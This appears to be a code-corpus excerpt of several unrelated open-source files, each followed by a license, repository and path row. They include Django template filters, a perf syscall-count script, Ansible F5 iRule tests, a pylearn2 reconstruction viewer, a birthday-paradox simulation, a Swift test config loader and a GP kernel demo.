return re.sub("\d([A-Z])", lambda m: m.group(0).lower(), t)
@register.filter(is_safe=True)
@stringfilter
def truncatechars(value, arg):
"""
Truncates a string after a certain number of characters.
Argument: Number of characters to truncate after.
"""
try:
length = int(arg)
except ValueError: # Invalid literal for int().
return value # Fail silently.
return Truncator(value).chars(length)
@register.filter(is_safe=True)
@stringfilter
def truncatewords(value, arg):
"""
Truncates a string after a certain number of words.
Argument: Number of words to truncate after.
Newlines within the string are removed.
"""
try:
length = int(arg)
except ValueError: # Invalid literal for int().
return value # Fail silently.
return Truncator(value).words(length, truncate=' ...')
@register.filter(is_safe=True)
@stringfilter
def truncatewords_html(value, arg):
"""
Truncates HTML after a certain number of words.
Argument: Number of words to truncate after.
Newlines in the HTML are preserved.
"""
try:
length = int(arg)
except ValueError: # invalid literal for int()
return value # Fail silently.
return Truncator(value).words(length, html=True, truncate=' ...')
@register.filter(is_safe=False)
@stringfilter
def upper(value):
"""Converts a string into all uppercase."""
return value.upper()
@register.filter(is_safe=False)
@stringfilter
def urlencode(value, safe=None):
"""
Escapes a value for use in a URL.
Takes an optional ``safe`` parameter used to determine the characters which
should not be escaped by Django's ``urlquote`` method. If not provided, the
default safe characters will be used (but an empty string can be provided
when *all* characters should be escaped).
"""
kwargs = {}
if safe is not None:
kwargs['safe'] = safe
return urlquote(value, **kwargs)
@register.filter(is_safe=True, needs_autoescape=True)
@stringfilter
def urlize(value, autoescape=None):
"""Converts URLs in plain text into clickable links."""
return mark_safe(urlize_impl(value, nofollow=True, autoescape=autoescape))
@register.filter(is_safe=True, needs_autoescape=True)
@stringfilter
def urlizetrunc(value, limit, autoescape=None):
"""
Converts URLs into clickable links, truncating URLs to the given character
limit, and adding 'rel=nofollow' attribute to discourage spamming.
Argument: Length to truncate URLs to.
"""
return mark_safe(urlize_impl(value, trim_url_limit=int(limit), nofollow=True,
autoescape=autoescape))
@register.filter(is_safe=False)
@stringfilter
def wordcount(value):
"""Returns the number of words."""
return len(value.split())
@register.filter(is_safe=True)
@stringfilter
def wordwrap(value, arg):
"""
Wraps words at specified line length.
Argument: number of characters to wrap the text at.
"""
return wrap(value, int(arg))
@register.filter(is_safe=True)
@stringfilter
def ljust(value, arg):
"""
Left-aligns the value in a field of a given width.
Argument: field size.
"""
return value.ljust(int(arg))
@register.filter(is_safe=True)
@stringfilter
def rjust(value, arg):
"""
Right-aligns the value in a field of a given width.
Argument: field size.
"""
return value.rjust(int(arg))
@register.filter(is_safe=True)
@stringfilter
def center(value, arg):
"""Centers the value in a field of a given width."""
return value.center(int(arg))
@register.filter
@stringfilter
def cut(value, arg):
"""
Removes all values of arg from the given string.
"""
safe = isinstance(value, SafeData)
value = value.replace(arg, '')
if safe and arg != ';':
return mark_safe(value)
return value
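# Note (added for clarity, an interpretation of the check above): a cut of
# ';' is never re-marked safe, presumably because stripping semicolons could
# mangle HTML entities such as ``&amp;`` in already-escaped output.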
###################
# HTML STRINGS #
###################
@register.filter("escape", is_safe=True)
@stringfilter
def escape_filter(value):
"""
    Marks the value as a string that should be auto-escaped.
"""
return mark_for_escaping(value)
@register.filter(is_safe=True)
@stringfilter
def force_escape(value):
"""
Escapes a string's HTML. This returns a new string containing the escaped
characters (as opposed to "escape", which marks the content for later
possible escaping).
"""
return escape(value)
@register.filter("linebreaks", is_safe=True, needs_autoescape=True)
@stringfilter
def linebreaks_filter(value, autoescape=None):
"""
Replaces line breaks in plain text with appropriate HTML; a single
newline becomes an HTML line break (``<br />``) and a new line
followed by a blank line becomes a paragraph break (``</p>``).
"""
autoescape = autoescape and not isinstance(value, SafeData)
return mark_safe(linebreaks(value, autoescape))
@register.filter(is_safe=True, needs_autoescape=True)
@stringfilter
def linebreaksbr(value, autoescape=None):
"""
Converts all newlines in a piece of plain text to HTML line breaks
(``<br />``).
"""
autoescape = autoescape and not isinstance(value, SafeData)
value = normalize_newlines(value)
if autoescape:
value = escape(value)
return mark_safe(value.replace('\n', '<br />'))
@register.filter(is_safe=True)
@stringfilter
def safe(value):
"""
Marks the value as a string that should not be auto-escaped.
"""
return mark_safe(value)
@register.filter(is_safe=True)
def safeseq(value):
"""
A "safe" filter for sequences. Marks each element in the sequence,
individually, as safe, after converting them to unicode. Returns a list
with the results.
"""
return [mark_safe(force_text(obj)) for obj in value]
@register.filter(is_safe=True)
@stringfilter
def removetags(value, tags):
"""Removes a space separated list of [X]HTML tags from the output."""
from django.utils.html import remove_tags
return remove_tags(value, tags)
@register.filter(is_safe=True)
@stringfilter
def striptags(value):
"""Strips all [X]HTML tags."""
return strip_tags(value)
###################
# LISTS #
###################
@register.filter(is_safe=False)
def dictsort(value, arg):
"""
Takes a list of dicts, returns that list sorted by the property given in
the argument.
"""
try:
return sorted(value, key=Variable(arg).resolve)
except (TypeError, VariableDoesNotExist):
return ''
@register.filter(is_safe=False)
def dictsortreversed(value, arg):
"""
Takes a list of dicts, returns that list sorted in reverse order by the
property given in the argument.
"""
try:
return sorted(value, key=Variable(arg).resolve, reverse=True)
except (TypeError, VariableDoesNotExist):
return ''
@register.filter(is_safe=False)
def first(value):
"""Returns the first item in a list."""
try:
return value[0]
except IndexError:
return ''
@register.filter(is_safe=True, needs_autoescape=True)
def join(value, arg, autoescape=None):
"""
Joins a list with a string, like Python's ``str.join(list)``.
"""
value = map(force_text, value)
if autoescape:
value = [conditional_escape(v) for v in value]
try:
data = conditional_escape(arg).join(value)
except AttributeError: # fail silently but nicely
return value
return mark_safe(data)
@register.filter(is_safe=True)
def last(value):
"Returns the last item in a list"
try:
return value[-1]
except IndexError:
return ''
@register.filter(is_safe=True)
def length(value):
"""Returns the length of the value - useful for lists."""
try:
return len(value)
except (ValueError, TypeError):
return ''
@register.filter(is_safe=False)
def length_is(value, arg):
"""Returns a boolean of whether the value's length is the argument."""
try:
return len(value) == int(arg)
except (ValueError, TypeError):
return ''
@register.filter(is_safe=True)
def random(value):
"""Returns a random item from the list."""
return random_module.choice(value)
@register.filter("slice", is_safe=True)
def slice_filter(value, arg):
"""
Returns a slice of the list.
Uses the same syntax as Python's list slicing; see
http://diveintopython.org/native_data_types/lists.html#odbchelper.list.slice
for an introduction.
"""
try:
bits = []
for x in arg.split(':'):
if len(x) == 0:
bits.append(None)
else:
bits.append(int(x))
return value[slice(*bits)]
except (ValueError, TypeError):
return value # Fail silently.
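# Illustrative example (not part of the original source):
# {{ some_list|slice:":2" }} returns the first two items of some_list.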
@register.filter(is_safe=True, needs_autoescape=True)
def unordered_list(value, autoescape=None):
"""
Recursively takes a self-nested list and returns an HTML unordered list --
WITHOUT opening and closing <ul> tags.
The list is assumed to be in the proper format. For example, if ``var``
contains: ``['States', ['Kansas', ['Lawrence', 'Topeka'], 'Illinois']]``,
then ``{{ var|unordered_list }}`` would return::
<li>States
<ul>
<li>Kansas
<ul>
<li>Lawrence</li>
<li>Topeka</li>
</ul>
</li>
<li>Illinois</li>
</ul>
</li>
"""
if autoescape:
escaper = conditional_escape
else:
escaper = lambda x: x
def convert_old_style_list(list_):
"""
Converts old style lists to the new easier to understand format.
The old list format looked like:
        ['Item 1', [['Item 1.1', []], ['Item 1.2', []]]]
And it is converted to:
        ['Item 1', ['Item 1.1', 'Item 1.2']]
"""
if not isinstance(list_, (tuple, list)) or len(list_) != 2:
return list_, False
first_item, second_item = list_
if second_item == []:
return [first_item], True
try:
# see if second item is iterable
iter(second_item)
except TypeError:
return list_, False
old_style_list = True
new_second_item = []
for sublist in second_item:
item, old_style_list = convert_old_style_list(sublist)
if not old_style_list:
break
new_second_item.extend(item)
if old_style_list:
second_item = new_second_item
return [first_item, second_item], old_style_list
def _helper(list_, tabs=1):
indent = '\t' * tabs
output = []
list_length = len(list_)
i = 0
while i < list_length:
title = list_[i]
sublist = ''
sublist_item = None
if isinstance(title, (list, tuple)):
sublist_item = title
title = ''
elif i < list_length - 1:
next_item = list_[i+1]
if next_item and isinstance(next_item, (list, tuple)):
# The next item is a sub-list.
sublist_item = next_item
# We've processed the next item now too.
i += 1
if sublist_item:
sublist = _helper(sublist_item, tabs+1)
sublist = '\n%s<ul>\n%s\n%s</ul>\n%s' % (indent, sublist,
indent, indent)
output.append('%s<li>%s%s</li>' % (indent,
escaper(force_text(title)), sublist))
i += 1
return '\n'.join(output)
value, converted = convert_old_style_list(value)
return mark_safe(_helper(value))
###################
# INTEGERS #
###################
@register.filter(is_safe=False)
def add(value, arg):
"""Adds the arg to the value."""
try:
return int(value) + int(arg)
except (ValueError, TypeError):
try:
return value + arg
except Exception:
return ''
@register.filter(is_safe=False)
def get_digit(value, arg):
"""
Given a whole number, returns the requested digit of it, where 1 is the
right-most digit, 2 is the second-right-most digit, etc. Returns the
original value for invalid input (if input or argument is not an integer,
or if argument is less than 1). Otherwise, output is always an integer.
"""
try:
arg = int(arg)
value = int(value)
except ValueError:
return value # Fail silently for an invalid argument
if arg < 1:
return value
try:
return int(str(value)[-arg])
except IndexError:
return 0
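# Illustrative example (not part of the original source):
# {{ 12345|get_digit:"2" }} renders "4" (the second-right-most digit).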
###################
# DATES #
###################
@register.filter(expects_localtime=True, is_safe=False)
def date(value, arg=None):
"""Formats a date according to the given format."""
if value in (None, ''):
return ''
if arg is None:
arg = settings.DATE_FORMAT
try:
return formats.date_format(value, arg)
except AttributeError:
try:
return format(value, arg)
except AttributeError:
return ''
@register.filter(expects_localtime=True, is_safe=False)
def time(value, arg=None):
"""Formats a time according to the given format."""
if value in (None, ''):
return ''
if arg is None:
arg = settings.TIME_FORMAT
try:
return formats.time_format(value, arg)
except AttributeError:
try:
return time_format(value, arg)
except AttributeError:
return ''
@register.filter("timesince", is_safe=False)
def timesince_filter(value, arg=None):
"""Formats a date as the time since that date (i.e. "4 days, 6 hours")."""
if not value:
return ''
try:
if arg:
return timesince(value, arg)
return timesince(value)
except (ValueError, TypeError):
return ''
@register.filter("timeuntil", is_safe=False)
def timeuntil_filter(value, arg=None):
"""Formats a date as the time until that date (i.e. "4 days, 6 hours")."""
if not value:
return ''
try:
return timeuntil(value, arg)
except (ValueError, TypeError):
return ''
###################
# LOGIC #
###################
@register.filter(is_safe=False)
def default(value, arg):
"""If value is unavailable, use given default."""
return value or arg
@register.filter(is_safe=False)
def default_if_none(value, arg):
"""If value is None, use given default."""
if value is None:
return arg
return value
@register.filter(is_safe=False)
def divisibleby(value, arg):
"""Returns True if the value is devisible by the argument."""
return int(value) % int(arg) == 0
@register.filter(is_safe=False)
def yesno(value, arg=None):
"""
Given a string mapping values for true, false and (optionally) None,
returns one of those strings according to the value:
========== ====================== ==================================
Value Argument Outputs
========== ====================== ==================================
``True`` ``"yeah,no,maybe"`` ``yeah``
``False`` ``"yeah,no,maybe"`` ``no``
``None`` ``"yeah,no,maybe"`` ``maybe``
``None`` ``"yeah,no"`` ``"no"`` (converts None to False
                                      if no mapping for None is given).
========== ====================== ==================================
"""
if arg is None:
arg = ugettext('yes,no,maybe')
bits = arg.split(',')
if len(bits) < 2:
return value # Invalid arg.
try:
yes, no, maybe = bits
except ValueError:
# Unpack list of wrong size (no "maybe" value provided).
yes, no, maybe = bits[0], bits[1], bits[1]
if value is None:
return maybe
if value:
return yes
return no
###################
# MISC #
###################
@register.filter(is_safe=True)
def filesizeformat(bytes):
"""
Formats the value like a 'human-readable' file size (i.e. 13 KB, 4.1 MB,
102 bytes, etc).
"""
try:
bytes = float(bytes)
    except (TypeError, ValueError, UnicodeDecodeError):
return ungettext("%(size)d byte", "%(size)d bytes", 0) % {'size': 0}
filesize_number_format = lambda value: formats.number_format(round(value, 1), 1)
KB = 1<<10
MB = 1<<20
GB = 1<<30
TB = 1<<40
PB = 1<<50
if bytes < KB:
return ungettext("%(size)d byte", "%(size)d bytes", bytes) % {'size': bytes}
if bytes < MB:
return ugettext("%s KB") % filesize_number_format(bytes / KB)
if bytes < GB:
return ugettext("%s MB") % filesize_number_format(bytes / MB)
if bytes < TB:
return ugettext("%s GB") % filesize_number_format(bytes / GB)
if bytes < PB:
return ugettext("%s TB") % filesize_number_format(bytes / TB)
return ugettext("%s PB") % filesize_number_format(bytes / PB)
@register.filter(is_safe=False)
def pluralize(value, arg='s'):
"""
Returns a plural suffix if the value is not 1. By default, 's' is used as
the suffix:
* If value is 0, vote{{ value|pluralize }} displays "0 votes".
* If value is 1, vote{{ value|pluralize }} displays "1 vote".
* If value is 2, vote{{ value|pluralize }} displays "2 votes".
If an argument is provided, that string is used instead:
* If value is 0, class{{ value|pluralize:"es" }} displays "0 classes".
* If value is 1, class{{ value|pluralize:"es" }} displays "1 class".
* If value is 2, class{{ value|pluralize:"es" }} displays "2 classes".
If the provided argument contains a comma, the text before the comma is
used for the singular case and the text after the comma is used for the
plural case:
* If value is 0, cand{{ value|pluralize:"y,ies" }} displays "0 candies".
* If value is 1, cand{{ value|pluralize:"y,ies" }} displays "1 candy".
* If value is 2, cand{{ value|pluralize:"y,ies" }} displays "2 candies".
"""
if not ',' in arg:
arg = ',' + arg
bits = arg.split(',')
if len(bits) > 2:
return ''
singular_suffix, plural_suffix = bits[:2]
try:
if int(value) != 1:
return plural_suffix
except ValueError: # Invalid string that's not a number.
pass
except TypeError: # Value isn't a string or a number; maybe it's a list?
try:
if len(value) != 1:
return plural_suffix
except TypeError: # len() of unsized object.
pass
return singular_suffix
@register.filter("phone2numeric", is_safe=True)
def phone2numeric_filter(value):
"""Takes a phone number and converts it in to its numerical equivalent."""
return phone2numeric(value)
@register.filter(is_safe=True)
def pprint(value):
"""A wrapper around pprint.pprint -- for debugging, really."""
try:
return pformat(value)
except Exception as e:
return "Error in formatting: %s" % force_text(e, errors="replace")
| bsd-3-clause |
TeamTwisted/kernel_lge_hammerhead | tools/perf/scripts/python/syscall-counts-by-pid.py | 11180 | 1927 | # system call counts, by pid
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import syscall_name
usage = "perf script -s syscall-counts-by-pid.py [comm]\n";
for_comm = None
for_pid = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
try:
for_pid = int(sys.argv[1])
except:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if (for_comm and common_comm != for_comm) or \
(for_pid and common_pid != for_pid ):
return
try:
syscalls[common_comm][common_pid][id] += 1
except TypeError:
syscalls[common_comm][common_pid][id] = 1
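# Note (added for clarity, not in the original script): the TypeError branch
# above covers the first occurrence of a syscall id, when the autodict leaf
# is still an empty dict rather than an integer counter.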
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events by comm/pid:\n\n",
print "%-40s %10s\n" % ("comm [pid]/syscalls", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"----------"),
comm_keys = syscalls.keys()
for comm in comm_keys:
pid_keys = syscalls[comm].keys()
for pid in pid_keys:
print "\n%s [%d]\n" % (comm, pid),
id_keys = syscalls[comm][pid].keys()
for id, val in sorted(syscalls[comm][pid].iteritems(), \
key = lambda(k, v): (v, k), reverse = True):
print " %-38s %10d\n" % (syscall_name(id), val),
| gpl-2.0 |
jmighion/ansible | test/units/modules/network/f5/test_bigip_irule.py | 51 | 8741 | # -*- coding: utf-8 -*-
#
# Copyright 2017 F5 Networks Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public Liccense for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import sys
from nose.plugins.skip import SkipTest
if sys.version_info < (2, 7):
raise SkipTest("F5 Ansible modules require Python >= 2.7")
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import patch, mock_open, Mock
from ansible.module_utils import basic
from ansible.module_utils._text import to_bytes
from ansible.module_utils.f5_utils import AnsibleF5Client
from ansible.module_utils.six import PY3
try:
from library.bigip_irule import Parameters
from library.bigip_irule import ModuleManager
from library.bigip_irule import ArgumentSpec
from library.bigip_irule import GtmManager
from library.bigip_irule import LtmManager
except ImportError:
try:
from ansible.modules.network.f5.bigip_irule import Parameters
from ansible.modules.network.f5.bigip_irule import ModuleManager
from ansible.modules.network.f5.bigip_irule import ArgumentSpec
from ansible.modules.network.f5.bigip_irule import GtmManager
from ansible.modules.network.f5.bigip_irule import LtmManager
except ImportError:
raise SkipTest("F5 Ansible modules require the f5-sdk Python library")
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def set_module_args(args):
args = json.dumps({'ANSIBLE_MODULE_ARGS': args})
basic._ANSIBLE_ARGS = to_bytes(args)
def load_fixture(name):
path = os.path.join(fixture_path, name)
if path in fixture_data:
return fixture_data[path]
with open(path) as f:
data = f.read()
try:
data = json.loads(data)
except Exception:
pass
fixture_data[path] = data
return data
class BigIpObj(object):
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
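# BigIpObj is a minimal attribute bag: e.g. BigIpObj(name='foo').name == 'foo'.
# The JSON fixtures loaded in setUp() below are wrapped this way to stand in
# for f5-sdk resource objects.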
class TestParameters(unittest.TestCase):
def test_module_parameters_ltm(self):
content = load_fixture('create_ltm_irule.tcl')
args = dict(
content=content,
module='ltm',
name='foo',
state='present'
)
p = Parameters(args)
assert p.content == content.strip()
def test_module_parameters_gtm(self):
content = load_fixture('create_gtm_irule.tcl')
args = dict(
content=content,
module='gtm',
name='foo',
state='present'
)
p = Parameters(args)
assert p.content == content.strip()
def test_api_parameters_ltm(self):
content = load_fixture('create_ltm_irule.tcl')
args = dict(
apiAnonymous=content
)
p = Parameters(args)
assert p.content == content.strip()
def test_return_api_params(self):
content = load_fixture('create_ltm_irule.tcl')
args = dict(
content=content,
module='ltm',
name='foo',
state='present'
)
p = Parameters(args)
params = p.api_params()
assert 'apiAnonymous' in params
@patch('ansible.module_utils.f5_utils.AnsibleF5Client._get_mgmt_root',
return_value=True)
class TestManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
self.ltm_irules = []
self.gtm_irules = []
members = load_fixture('load_ltm_irules.json')
for item in members:
self.ltm_irules.append(BigIpObj(**item))
members = load_fixture('load_gtm_irules.json')
for item in members:
self.gtm_irules.append(BigIpObj(**item))
def test_create_ltm_irule(self, *args):
set_module_args(dict(
name='foo',
module='ltm',
content='this is my content',
partition='Common',
server='localhost',
password='password',
user='admin'
))
client = AnsibleF5Client(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode,
f5_product_name=self.spec.f5_product_name,
mutually_exclusive=self.spec.mutually_exclusive,
)
# Override methods in the specific type of manager
tm = LtmManager(client)
tm.exists = Mock(side_effect=[False, True])
tm.create_on_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(client)
mm.get_manager = Mock(return_value=tm)
results = mm.exec_module()
assert results['changed'] is True
assert results['content'] == 'this is my content'
def test_create_gtm_irule(self, *args):
set_module_args(dict(
name='foo',
module='gtm',
content='this is my content',
partition='Common',
server='localhost',
password='password',
user='admin'
))
client = AnsibleF5Client(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode,
f5_product_name=self.spec.f5_product_name,
mutually_exclusive=self.spec.mutually_exclusive,
)
# Override methods in the specific type of manager
tm = GtmManager(client)
tm.exists = Mock(side_effect=[False, True])
tm.create_on_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(client)
mm.get_manager = Mock(return_value=tm)
results = mm.exec_module()
assert results['changed'] is True
assert results['content'] == 'this is my content'
def test_create_gtm_irule_src(self, *args):
set_module_args(dict(
name='foo',
module='gtm',
src='/path/to/irules/foo.tcl',
partition='Common',
server='localhost',
password='password',
user='admin'
))
client = AnsibleF5Client(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode,
f5_product_name=self.spec.f5_product_name,
mutually_exclusive=self.spec.mutually_exclusive,
)
if PY3:
builtins_name = 'builtins'
else:
builtins_name = '__builtin__'
with patch(builtins_name + '.open', mock_open(read_data='this is my content'), create=True):
# Override methods in the specific type of manager
tm = GtmManager(client)
tm.exists = Mock(side_effect=[False, True])
tm.create_on_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(client)
mm.get_manager = Mock(return_value=tm)
results = mm.exec_module()
assert results['changed'] is True
assert results['content'] == 'this is my content'
assert results['module'] == 'gtm'
assert results['src'] == '/path/to/irules/foo.tcl'
assert len(results.keys()) == 4
def test_module_mutual_exclusion(self, *args):
set_module_args(dict(
content='foo',
module='ltm',
name='foo',
state='present',
src='/path/to/irules/foo.tcl',
partition='Common',
server='localhost',
password='password',
user='admin'
))
with patch('ansible.module_utils.basic.AnsibleModule.fail_json', unsafe=True) as mo:
AnsibleF5Client(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode,
f5_product_name=self.spec.f5_product_name,
mutually_exclusive=self.spec.mutually_exclusive,
)
mo.assert_called_once()
| gpl-3.0 |
hyqneuron/pylearn2-maxsom | pylearn2/scripts/dbm/show_reconstructions.py | 7 | 4853 | #!/usr/bin/env python
from __future__ import print_function
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2012, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
"""
Usage: python show_reconstructions.py <path_to_a_saved_DBM.pkl>
Displays a batch of data from the DBM's training set.
Then shows how the DBM reconstructs it if you run mean field
to estimate the hidden units, then do one mean field downward
pass from hidden_layers[0] to the visible layer.
"""
from pylearn2.utils import serial
import sys
from pylearn2.config import yaml_parse
from pylearn2.gui.patch_viewer import PatchViewer
from theano.compat.six.moves import input, xrange
from theano import function
rows = 5
cols = 10
m = rows * cols
_, model_path = sys.argv
print('Loading model...')
model = serial.load(model_path)
model.set_batch_size(m)
dataset_yaml_src = model.dataset_yaml_src
print('Loading data...')
dataset = yaml_parse.load(dataset_yaml_src)
x = input('use test set? (y/n) ')
if x == 'y':
dataset = dataset.get_test_set()
else:
assert x == 'n'
vis_batch = dataset.get_batch_topo(m)
_, patch_rows, patch_cols, channels = vis_batch.shape
assert _ == m
mapback = hasattr(dataset, 'mapback_for_viewer')
actual_cols = 2 * cols * (1 + mapback) * (1 + (channels == 2))
pv = PatchViewer((rows, actual_cols), (patch_rows, patch_cols), is_color=(channels == 3))
batch = model.visible_layer.space.make_theano_batch()
topo = batch.ndim > 2
reconstruction = model.reconstruct(batch)
recons_func = function([batch], reconstruction)
def show():
ipt = vis_batch.copy()
if not topo:
ipt = dataset.get_design_matrix(ipt)
recons_batch = recons_func(ipt.astype(batch.dtype))
if not topo:
recons_batch = dataset.get_topological_view(recons_batch)
if mapback:
design_vis_batch = vis_batch
if design_vis_batch.ndim != 2:
design_vis_batch = dataset.get_design_matrix(design_vis_batch.copy())
mapped_batch_design = dataset.mapback(design_vis_batch.copy())
mapped_batch = dataset.get_topological_view(
mapped_batch_design.copy())
design_r_batch = recons_batch.copy()
if design_r_batch.ndim != 2:
design_r_batch = dataset.get_design_matrix(design_r_batch.copy())
mapped_r_design = dataset.mapback(design_r_batch.copy())
mapped_r_batch = dataset.get_topological_view(mapped_r_design.copy())
for row in xrange(rows):
row_start = cols * row
for j in xrange(cols):
vis_patch = vis_batch[row_start+j,:,:,:].copy()
adjusted_vis_patch = dataset.adjust_for_viewer(vis_patch)
if vis_patch.shape[-1] == 2:
pv.add_patch(adjusted_vis_patch[:,:,1], rescale=False)
pv.add_patch(adjusted_vis_patch[:,:,0], rescale=False)
else:
pv.add_patch(adjusted_vis_patch, rescale = False)
r = vis_patch
#print 'vis: '
#for ch in xrange(3):
# chv = r[:,:,ch]
# print '\t',ch,(chv.min(),chv.mean(),chv.max())
if mapback:
pv.add_patch(dataset.adjust_for_viewer(
mapped_batch[row_start+j,:,:,:].copy()), rescale = False)
if recons_batch.shape[-1] == 2:
pv.add_patch(dataset.adjust_to_be_viewed_with(
recons_batch[row_start+j,:,:,1].copy(),
vis_patch), rescale = False)
pv.add_patch(dataset.adjust_to_be_viewed_with(
recons_batch[row_start+j,:,:,0].copy(),
vis_patch), rescale = False)
else:
pv.add_patch(dataset.adjust_to_be_viewed_with(
recons_batch[row_start+j,:,:,:].copy(),
vis_patch), rescale = False)
r = recons_batch[row_start+j,:,:,:]
#print 'recons: '
#for ch in xrange(3):
# chv = r[:,:,ch]
# print '\t',ch,(chv.min(),chv.mean(),chv.max())
if mapback:
pv.add_patch(dataset.adjust_to_be_viewed_with(
mapped_r_batch[row_start+j,:,:,:].copy(),
mapped_batch[row_start+j,:,:,:].copy()),rescale = False)
pv.show()
if hasattr(model.visible_layer, 'beta'):
beta = model.visible_layer.beta.get_value()
#model.visible_layer.beta.set_value(beta * 100.)
print('beta: ',(beta.min(), beta.mean(), beta.max()))
while True:
show()
print('Displaying reconstructions. (q to quit, ENTER = show more)')
while True:
x = input()
if x == 'q':
quit()
if x == '':
x = 1
break
else:
print('Invalid input, try again')
vis_batch = dataset.get_batch_topo(m)
| bsd-3-clause |
eshasharma/mase | python101/code/birthday.py | 14 | 1302 | """This module contains code from
Think Python by Allen B. Downey
http://thinkpython.com
Copyright 2012 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
import random
def has_duplicates(t):
"""Returns True if any element appears more than once in (t),
False otherwise."""
s = t[:]
s.sort()
for i in range(len(s)-1):
if s[i] == s[i+1]:
return True
return False
def random_bdays(n):
"""Returns a list of integers between 1 and 365, with length (n)."""
t = []
for i in range(n):
bday = random.randint(1, 365)
t.append(bday)
return t
def count_matches(students, samples):
"""Generates (samples) samples of (students) students, and counts
how many of them have at least one pair of students with the same bday."""
count = 0
for i in range(samples):
t = random_bdays(students)
if has_duplicates(t):
count += 1
return count
"""run the birthday simulation 1000 times and print the number of matches"""
num_students = 23
num_simulations = 1000
count = count_matches(num_students, num_simulations)
print 'After %d simulations' % num_simulations
print 'with %d students' % num_students
print 'there were %d simulations with at least one match' % count
| unlicense |
zaitcev/swift-lfs | test/__init__.py | 6 | 1475 | # See http://code.google.com/p/python-nose/issues/detail?id=373
# The code below enables nosetests to work with i18n _() blocks
import __builtin__
import sys
import os
from swift.common.utils import readconf
setattr(__builtin__, '_', lambda x: x)
# Work around what seems to be a Python bug.
# c.f. https://bugs.launchpad.net/swift/+bug/820185.
import logging
logging.raiseExceptions = False
def get_config(section_name=None, defaults=None):
"""
Attempt to get a test config dictionary.
:param section_name: the section to read (all sections if not defined)
:param defaults: an optional dictionary namespace of defaults
"""
config_file = os.environ.get('SWIFT_TEST_CONFIG_FILE',
'/etc/swift/test.conf')
config = {}
if defaults is not None:
config.update(defaults)
try:
config = readconf(config_file, section_name)
except SystemExit:
if not os.path.exists(config_file):
print >>sys.stderr, \
'Unable to read test config %s - file not found' \
% config_file
elif not os.access(config_file, os.R_OK):
print >>sys.stderr, \
'Unable to read test config %s - permission denied' \
% config_file
else:
print >>sys.stderr, \
'Unable to read test config %s - section %s not found' \
% (config_file, section_name)
return config
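# A minimal sketch of typical use from a functional test (the section name and
# defaults are illustrative):
#   conf = get_config('func_test', defaults={'auth_host': '127.0.0.1'})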
| apache-2.0 |
mlds-lab/egk | demo.py | 1 | 1643 | import numpy as np
import cPickle as pickle
from sklearn.svm import LinearSVC
import gp
from full_marginal import compute_means_covs
from fastfood import FastfoodEGK
def main():
np.random.seed(111)
with open('data/ECG200-50.pkl', 'rb') as f:
ts_train, ts_test, l_train, l_test = pickle.load(f)
# Estimate GP hyperparameters and the noise parameter by maximizing
# the marginal likelihood.
gp_parms = gp.learn_hyperparms(ts_train)
# All time series are defined over a common time interval [0, 1].
# We use 300 evenly-spaced reference time points between [0, 1]
# to represent each time series.
t_ref = np.linspace(0, 1, 300)
# Compute the marginal posterior mean and covariance matrix for
# both training and test time series
train_means, train_covs = compute_means_covs(ts_train, t_ref, gp_parms)
test_means, test_covs = compute_means_covs(ts_test, t_ref, gp_parms)
# We use 500 random features with low-rank approximation, rank 10 in this
# case, and normalize the random feature vector to have unit length.
    # Dropping the rank argument or setting rank to 0 turns off the low-rank
    # approximation.
# The parameters gamma and C can be chosen using cross validation.
rp = FastfoodEGK(gamma=20, n_sample=500, rank=10,
normalize=True)
clf = LinearSVC(C=100)
X_train = rp.fit_transform(train_means, train_covs)
clf.fit(X_train, l_train)
X_test = rp.transform(test_means, test_covs)
l_predict = clf.predict(X_test)
accuracy = np.mean(l_predict == l_test)
print accuracy
if __name__ == '__main__':
main()
| mit |
helldorado/ansible | lib/ansible/modules/cloud/kubevirt/kubevirt_template.py | 16 | 14883 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2019, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: kubevirt_template
short_description: Manage KubeVirt templates
description:
